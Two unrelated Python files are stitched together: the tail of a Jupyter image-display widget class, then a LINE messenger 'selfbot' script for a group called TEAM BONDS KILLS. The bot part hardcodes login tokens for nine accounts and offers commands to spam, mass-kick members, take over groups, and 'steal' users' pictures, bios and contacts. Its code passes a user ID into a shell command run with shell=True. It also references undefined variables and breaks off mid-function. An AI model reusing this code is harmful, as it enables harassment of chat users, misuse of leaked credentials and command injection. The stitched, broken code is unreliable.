self.hidden = False
self.display_colorspace = display_colorspace
self.apply_mask = apply_mask
self.dataset_idx = 0
self.update_frame_cbs = update_frame_cbs or []
# read the data from a file to display
if img is None:
if dataset is not None:
bgr, _ = next(iter(dataset))
self.raw_frame = Frame(bgr, ColorSpaces.BGR)
elif frame is not None and type(frame is Frame):
self.raw_frame = frame
elif img_path is not None:
bgr = cv2.imread(img_path)
if bgr is None:
raise Exception("Failed to read image at img_path")
self.raw_frame = Frame(bgr, ColorSpaces.BGR)
else:
self.raw_frame = next(iter(self.video_stream))
else:
self.raw_frame = Frame(img, ColorSpaces.BGR)
self.filtered_frame = Frame.copy_of(self.raw_frame)
self.labelled_frame = Frame.copy_of(self.filtered_frame)
self.update_data_and_display()
if self.dataset is not None:
self.interactors.insert(0, DataSetBrowser(self.dataset))
if not any(isinstance(inter, FrameLabeller) for inter in self.interactors):
self.interactors.append(FrameLabeller(self.dataset.labels))
if self.vision_system is not None:
self.interactors.append(ResultDisplayer(self.vision_system))
# link all required interactors
for interactor in self.interactors:
interactor.link_with(self)
self.image_plot = self.make_image_plot()
interactors_with_controls = [
interactor for interactor in self.interactors if interactor.ipy_controls is not None]
panel_controls = [
interactor.ipy_controls for interactor in interactors_with_controls if interactor.is_panel]
toolbar_controls = [
interactor.ipy_controls for interactor in interactors_with_controls if not interactor.is_panel]
display_pane = ipy.VBox([
self.image_plot,
self.make_image_tools(self.image_plot)
] + toolbar_controls)
display_pane.layout.width = str(
size * available_space * self.FULL_EXTERNAL_WIDTH) + 'px'
# fill accross 1/size times before filling downwards
hbox_list = [display_pane]
vbox_list = []
for controls in (c for c in panel_controls if c is not None):
hbox_list.append(controls)
if len(hbox_list) == int(1 / size):
vbox_list.append(ipy.HBox(hbox_list))
hbox_list = []
# add the remainder
vbox_list += hbox_list
super().__init__(vbox_list, **kwargs)
def make_image_plot(self):
marks = [self.bq_img]
for interactor in self.interactors:
marks += interactor.image_plot_marks
image_plot = bq.Figure(
marks=marks,
padding_y=0
)
height, width, _ = self.raw_frame.get(ColorSpaces.BGR).shape
# make sure the image is displayed with the correct aspect ratio
# TODO: is this broken?
image_plot.layout.width = '100%'
image_plot.layout.margin = '0'
image_plot.layout.height = str(
(self.FULL_INTERNAL_WIDTH * height / width + self.FULL_OFFSET) * self.size * self.available_space) + 'px'
return image_plot
def make_image_tools(self, image_plot):
widget_list = [
self.make_toggle_panzoom_button(image_plot),
self.make_reset_zoom_button(),
self.make_toggle_apply_mask_button()
]
if self.video_stream is not None:
if self.video_stream.on_disk:
widget_list.append(self.make_video_controller())
else:
# start the livestream pipe to this displaypane on a separate thread
Thread(target=self.pipe_livestream).start()
if self.dataset is not None:
if self.dataset.type_str in ["img-dir", "vid"]:
widget_list.append(self.make_dataset_frame_browser())
return ipy.HBox(widget_list)
def pipe_livestream(self):
for frame in self.video_stream:
self.raw_frame = frame
self.update_data_and_display()
def make_toggle_apply_mask_button(self):
button = ipy.ToggleButton(
value=False,
tooltip='Toggle Mask',
icon='eye-slash'
)
button.layout.width = '60px'
def on_toggle(change):
self.apply_mask = not self.apply_mask
self.update_data_and_display()
button.observe(on_toggle, 'value')
return button
def make_toggle_panzoom_button(self, image_plot):
self.image_plot_panzoom = bq.interacts.PanZoom(
scales={'x': [self.image_plot_scales['x']],
'y': [self.image_plot_scales['y']]},
)
button = ipy.ToggleButton(
value=False,
tooltip='Toggle Pan / Zoom',
icon='arrows'
)
button.layout.width = '60px'
def on_toggle(change):
if change['new']:
image_plot.interaction = self.image_plot_panzoom
else:
image_plot.interaction = None
button.observe(on_toggle, 'value')
self.add_to_togglebutton_group(button)
return button
def make_reset_zoom_button(self):
button = ipy.Button(
disabled=False,
tooltip='Reset zoom',
icon='refresh'
)
button.layout.width = '60px'
def on_click(_change):
self.image_plot_panzoom.scales['x'][0].min = None
self.image_plot_panzoom.scales['x'][0].max = None
self.image_plot_panzoom.scales['y'][0].min = None
self.image_plot_panzoom.scales['y'][0].max = None
button.on_click(on_click)
return button
def make_dataset_frame_browser(self):
if self.dataset.type_str == "vid":
cap = cv2.VideoCapture(self.dataset.filepath)
fps = cap.get(cv2.CAP_PROP_FPS)
if self.dataset.type_str == "img-dir":
fps = 2
last_frame = len(self.dataset) - 1
player = ipy.Play(
interval=1000 / fps,
max=last_frame
)
slider = ipy.IntSlider(max=last_frame,
continuous_update=False)
ipy.link((player, 'value'), (slider, 'value'))
def on_framechange(change):
self.dataset_idx = change['new']
self.raw_frame = self.dataset.read_frame(self.dataset_idx)
self.update_data_and_display()
player.observe(on_framechange, 'value')
slider.observe(on_framechange, 'value')
def change_slider(amount):
def cb(_change):
slider.value += amount
if slider.value > last_frame:
slider.value = last_frame
elif slider.value < 0:
slider.value = 0
return cb
prev_frame_button = ipy.Button(
icon='step-backward',
tooltip='Previous Frame'
)
prev_frame_button.layout.width = '60px'
prev_frame_button.on_click(change_slider(-1))
next_frame_button = ipy.Button(
icon='step-forward',
tooltip='Next Frame'
)
next_frame_button.layout.width = '60px'
next_frame_button.on_click(change_slider(+1))
controller = ipy.HBox(
[prev_frame_button, player, next_frame_button, slider])
return controller
def make_video_controller(self):
last_frame = self.video_stream.cap.get(cv2.CAP_PROP_FRAME_COUNT) - 1
player = ipy.Play(
interval=1000 / self.video_stream.cap.get(cv2.CAP_PROP_FPS),
max=last_frame
)
slider = ipy.IntSlider(max=last_frame)
ipy.link((player, 'value'), (slider, 'value'))
def on_framechange(change):
frame_idx = change['new']
self.raw_frame = self.video_stream.read_frame(frame_idx)
self.update_data_and_display()
player.observe(on_framechange, 'value')
slider.observe(on_framechange, 'value')
def change_slider(amount):
def cb(_change):
slider.value += amount
if slider.value > last_frame:
slider.value = last_frame
elif slider.value < 0:
slider.value = 0
return cb
prev_frame_button = ipy.Button(
icon='step-backward',
tooltip='Previous Frame'
)
prev_frame_button.layout.width = '60px'
prev_frame_button.on_click(change_slider(-1))
next_frame_button = ipy.Button(
icon='step-forward',
tooltip='Next Frame'
)
next_frame_button.layout.width = '60px'
next_frame_button.on_click(change_slider(+1))
controller = ipy.HBox(
[prev_frame_button, player, next_frame_button, slider])
return controller
def update_data_and_display(self):
if not self.hidden:
# filter the image if need be
self.filtered_frame.link(self.raw_frame, ColorSpaces.BGR)
if self.filter_fn is not None:
self.filtered_frame.copy(self.filter_fn(
self.filtered_frame), ColorSpaces.BGR)
self.labelled_frame.copy(self.filtered_frame, ColorSpaces.BGR)
if self.vision_system is not None:
self.vision_system.update_with_frame(self.labelled_frame)
for cb in self.update_frame_cbs:
cb()
bgr_img = self.labelled_frame.get(self.display_colorspace)
# apply the mask here for view purposes
if self.apply_mask and self.labelled_frame.mask is not None:
bgr_img = cv2.bitwise_and(
bgr_img, bgr_img, mask=self.labelled_frame.mask)
ipy_img = ipy.Image(value=cv2.imencode('.jpg', bgr_img)[
1].tostring(), format='jpg')
if self.bq_img is None:
self.bq_img = bq.Image(
image=ipy_img, scales=self.image_plot_scales)
else:
self.bq_img.image = ipy_img
def link_frame(self, master_pane):
def on_update_frame():
self.raw_frame = master_pane.raw_frame
self.update_data_and_display()
master_pane.update_frame_cbs.append(on_update_frame)
def add_interactor(self, display_pane_interactor):
display_pane_interactor.link_with(self)
self.interactors.append(display_pane_interactor)
def set_interaction(self, interaction):
self.image_plot.interaction = interaction
def clear_interaction(self):
self.image_plot.interaction = None
def add_to_togglebutton_group(self, togglebutton):
self.togglebutton_group.append(togglebutton)
def on_toggle(change):
if change['new'] is True:
for button in self.togglebutton_group:
if button is not togglebutton:
button.value = False
togglebutton.observe(on_toggle, 'value')
def show(self):
self.hidden = False
self.update_data_and_display()
def hide(self):
self.hidden = True
|
10bot.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=")
ki.loginResult()
#kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
#kk.login(token="EnnlBHTi4QbQKi1Xqla3.TrVjFf5pyd8D+ZxPusvq0W.HDtFuFulskxycJocqYbAK9krFT5ixRMAnrjU3XcDogI=")
#kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
ks.loginResult()
k1 = LINETCR.LINE() #nami
#k1.login(qr=True)
k1.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
k1.loginResult()
k2 = LINETCR.LINE() #nico robin
#k2.login(qr=True)
k2.login(token="EnGPRLTejNE6mFHDQ2Df.9eQsWmyR4F9AFNPZDyQTtW.N7zwS68J1xmBOk4Z9Fcj2iE+PchLC8MpKvb0TuiKWKU=")
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="En4fEPZ8IBZ2nUUfOpLd.6WqeC+1pukOllkvQ7Oglhq.m7o3gNWWMCJEkoLhAXgymM1CMP6bYkGyBBvplepM+YI=")
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="En2h1tGCsqKy5ZM2j2A2.EX9POTYx+gKdjKz7DQlnSG./5hJc91p8FXQkExd5oGOeB87cra3yuQhmJmTMnhz7oI=")
k4.loginResult()
#k5 = LINETCR.LINE() #
#k5.login(qr=True)
#k5.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=")
#k5.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=") #satpam
#satpam.login(qr=True)
satpam.loginResult()
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""TAEM BONDS KILLS✰
Owner : Babang adhi
-----------------------
-=♦·Menu For Public·♦=-
[•]Help
[•]Key
[•]Mimin/Min
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-------=====---------
✰ TEAM BONDS KILLS✰
-------=====---------
"""
Keyowner =""" ✰ TEAM BONDS KILLS ✰
Owner : ✰BABANG ADHI=-
-----=====------------
-=♦·Menu For Owner·=-
[•]Kick ...
[•]Invite (by mid)
[•]Undang (Invite user by kontak)
[•]Adminlist
[•]Bot Add @
[•]Spam... (spam on 10 tes)
[•]Bot? (cek kontak bot)
[•]Cancel (cancel undangan tertunda)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (cek status room)
[•]Sider
[•]Intip
[•]Ciduk
[•]Nk
[•]Hajar
[•]Vkick
[•]Assalammualaikum/Halo
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Kurangin
[•]Rusakin
[•]Tambah
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-------=====-------
✰ TEAM BONDS KILLS ✰
-----====----------
"""
Setgroup =""" -=Team Bonds Killa=-
-==♦·Menu For Admin·♦==-
------=====---------
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject semua invite)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel semua undangan)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (invite grup)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (canccel all invite)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (ganti bio stat bot)
[•]Myname: (ganti nama bot)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @"
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]Join/Masuk
[•]Bye all
[•]Pulang
[•]Bot pulang
[•]Anu:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Sikat
[•]Greet
-==Hanya Untuk Owner and Admin==-
Creator by Babang Adhi https://line.me/ti/p/boy29putra
----=====-----------
"""
KAC=[cl,ki,kc,ks,k1,k2,k3,k4]
DEF=[ki,kc,ks,k1,k2,k3,k4]
mid = cl.getProfile().mid
["uc2e8b426f6591045943eae5304e67c32"]
Amid = ki.getProfile().mid
["uce7a0da7850e53de4452cfe4535084e2"]
#Bmid = kk.getProfile().mid
#["ub51bc97c5e4f603f1dff35e9512550d3"]
Cmid = kc.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Dmid = ks.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Emid = k1.getProfile().mid
["u0548e577b8d144d19d36617941d15062"]
Fmid = k2.getProfile().mid
["uf44a92c0c62be1ff5a7e7a73758aad4f"]
Gmid = k3.getProfile().mid
["ueb040473fd4f50aa0b2ca56aee818b1d"]
Hmid = k4.getProfile().mid
["u7b1f69a2dc97fc690326467b76a2cdb2"]
#Imid = k5.getProfile().mid
#["uce7a0da7850e53de4452cfe4535084e2"]
Smid = satpam.getProfile().mid
["uce7a0da7850e53de4452cfe4535084e2"]
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid]
induk=["uc2e8b426f6591045943eae5304e67c32"]
Creator=["uc2e8b426f6591045943eae5304e67c32","uce7a0da7850e53de4452cfe4535084e2"]
admin=["uc2e8b426f6591045943eae5304e67c32"]
owner=["uc2e8b426f6591045943eae5304e67c32","uce7a0da7850e53de4452cfe4535084e2"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"тerima Kasih Sudah Menambahkan Aku kak",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\nBabang-adhi",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":False, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = kk.getProfile()
#backup = kk.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = k5.getProfile()
#backup = k5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Fmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Gmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Hmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Imid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
